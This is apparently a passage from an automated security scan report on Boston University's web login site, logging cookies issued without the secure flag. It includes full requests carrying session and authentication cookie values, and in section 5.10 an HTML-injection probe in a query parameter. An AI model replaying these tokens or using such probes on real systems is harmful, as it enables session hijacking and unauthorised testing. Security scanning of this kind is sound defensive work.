Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; isMobile=false_1.1; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:48:03 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Wed, 01 Jun 2005 12:35:47 GMT
ETag: "41bd040100b7-e36-3f87a5c37eec0"
Accept-Ranges: bytes
Content-Length: 3638
X-BU-Main-Uniqueid: ToyYUwrxHDsAAE03@Z8AAAAM
X-BU-Duration: D=7732
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/plain

..............h...&... ..............(....... ...........@...........................XX..........rrr.....''........==................................................................................
...[SNIP]...

5.6. https://weblogin.bu.edu/lib/css/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /lib/css/style.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lib/css/style.css HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://weblogin.bu.edu//web@login3?jsv=1.5p&br=un&fl=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; isMobile=false_1.1; wl4cap=1317836819%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:47:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 16 Aug 2011 08:06:23 GMT
ETag: "9c68040100b7-1b0f-4aa9adb03fdc0"
Accept-Ranges: bytes
Content-Length: 6927
X-BU-Main-Uniqueid: ToyYFArxHDsAAE5mG4MAAAAQ
X-BU-Duration: D=7569
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/css

/*
   Project: BU WebLogin
   Author(s): Jon Brousseau & Tim Wright
   Created: March 2011
*/

/* RESET --------------------------------------------------------- */

html,body,div,span,object,
iframe,h1,h2,
...[SNIP]...

5.7. https://weblogin.bu.edu/lib/images/form-bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /lib/images/form-bg.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lib/images/form-bg.jpg HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu//web@login3?jsv=1.5p&br=un&fl=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; wl4cap=1317836819%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:47:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Wed, 13 Apr 2011 20:04:04 GMT
ETag: "9c6a040100b7-13f-4a0d24f7cd500"
Accept-Ranges: bytes
Content-Length: 319
X-BU-Main-Uniqueid: ToyYFArxHDsAAE5lGRkAAAAP
X-BU-Duration: D=7668
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/jpeg

......Exif..II*.................Ducky.......<......Adobe.d....................    ...    .......

.

.......................................................................................................
...[SNIP]...

5.8. https://weblogin.bu.edu/lib/images/subsig-large.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /lib/images/subsig-large.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lib/images/subsig-large.gif HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu//web@login3?jsv=1.5p&br=un&fl=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; wl4cap=1317836819%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:47:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Wed, 13 Apr 2011 20:04:04 GMT
ETag: "9c6b040100b7-4dd-4a0d24f7cd500"
Accept-Ranges: bytes
Content-Length: 1245
X-BU-Main-Uniqueid: ToyYFArxHDsAAE4ID3cAAAAF
X-BU-Duration: D=7457
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/gif

GIF89a..#..*....@@@.........000......```.DDPPP... .ff...ppp.......ww.........."".UU.33................................................................................................................
...[SNIP]...

5.9. https://weblogin.bu.edu/lib/scripts/BUweblogin.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /lib/scripts/BUweblogin.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lib/scripts/BUweblogin.js HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu//web@login3?jsv=1.5p&br=un&fl=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; isMobile=false_1.1; wl4cap=1317836819%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:47:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Mon, 01 Aug 2011 19:37:10 GMT
ETag: "9c6c040100b7-aba-4a976c1d46580"
Accept-Ranges: bytes
Content-Length: 2746
X-BU-Main-Uniqueid: ToyYFArxHDsAAE5UEuAAAAAH
X-BU-Duration: D=7839
X-BU-Backend: (null) (null)
Connection: close
Content-Type: application/x-javascript

var IE4 = document.all;
var NS4 = document.layers;
function enter_key_trap (e) {
var keyPressed;
if (NS4)
keyPressed = String.fromCharCode(e.which);
else if (IE4)
keyPressed = String.fro
...[SNIP]...

5.10. https://weblogin.bu.edu/web@login3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web@login3?jsv=1.5p4a644%22%3E%3Ca%3E54f2c5b14d7&br=un&fl=0 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:54 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: up
X-UniqueID: ToyYwgrxHDsAAFl@RhA
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:49:54 GMT
Set-Cookie: wl4cap=1317836995%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; path=/
X-BU-Main-Uniqueid: ToyYwgrxHDsAAFiBZSsAAABF
X-BU-Duration: D=910450
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 2758

<!DOCTYPE html>
<html class="no-js">
<head>
<meta charset="UTF-8">
<title>Boston University | Web Login</title>

<!-- InstanceBegin name="header_template" -->

<link rel="stylesheet" type="t
...[SNIP]...

5.11. https://weblogin.bu.edu/web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bu.edu/directory/change-entry.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); isMobile=false_1.2; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:48:01 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: ToyYUQrxHDsAAEIXd9A
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:48:01 GMT
X-BU-Main-Uniqueid: ToyYUQrxHDsAAFC0OSgAAAAR
X-BU-Duration: D=101903
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

5.12. https://weblogin.bu.edu/web@login3/1317837446/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837446.11881  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317837446/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837446.11881

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web@login3/1317837446/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837446.11881 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ezproxy.bu.edu/login
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:59:24 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: Toya-ArxHDsAAFvabkM
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:59:24 GMT
X-BU-Main-Uniqueid: Toya-ArxHDsAAFIjVuMAAAAP
X-BU-Duration: D=24167271
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

5.13. https://weblogin.bu.edu/web@login3/1317837562/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317837562/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web@login3/1317837562/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://people.bu.edu/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; isMobile=false_1.2

Response

HTTP/1.1 401 Authorization Required
Date: Wed, 05 Oct 2011 18:01:53 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
WWW-Authenticate: Basic realm="BU login and Kerberos passwd 05Oct 14:0225"
X-BU-Tag: auth
X-UniqueID: ToybkQrxHDsAAGa7HzE
Content-Type: text/html; charset=iso-8859-1
X-BU-Main-Uniqueid: ToybkQrxHDsAAGazeO0AAAA@
X-BU-Duration: D=40193402
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 397

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>401 Authorization Required</TITLE>
</HEAD><BODY>
<H1>Authorization Required</H1>
This server could not verify that you
are author
...[SNIP]...

5.14. https://weblogin.bu.edu/web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.11207  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.11207

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.11207 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://alumni.bu.edu/olc/pub/BUAR/login/BUAR-extauth.cgi?url=http%3a//alumni.bu.edu/olc/membersonly/BUAR/mypage.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; wl4cap=1317837588%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.19.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:04:54 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: ToycRgrxHDsAAFvabks
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 18:04:54 GMT
X-BU-Main-Uniqueid: ToycRgrxHDsAAGaoW@YAAAAi
X-BU-Duration: D=24104411
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

5.15. https://weblogin.bu.edu/web@login3/1317837749/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837749.14309  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317837749/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837749.14309

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web@login3/1317837749/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837749.14309 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://alumni.bu.edu/olc/pub/BUAR/login/BUAR-extauth.cgi?url=http%3a//alumni.bu.edu/olc/membersonly/BUAR/mypage.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; wl4cap=1317837588%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.20.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:05:39 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: ToyccwrxHDsAAGWJAWs
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 18:05:39 GMT
X-BU-Main-Uniqueid: ToyccwrxHDsAAGarZZ4AAAAq
X-BU-Duration: D=24106310
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

5.16. https://weblogin.bu.edu/web@login3/1317837809/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837809.14786  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317837809/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837809.14786

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web@login3/1317837809/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837809.14786 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://alumni.bu.edu/olc/pub/BUAR/login/BUAR-extauth.cgi?url=http%3a//alumni.bu.edu/olc/membersonly/BUAR/mypage.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
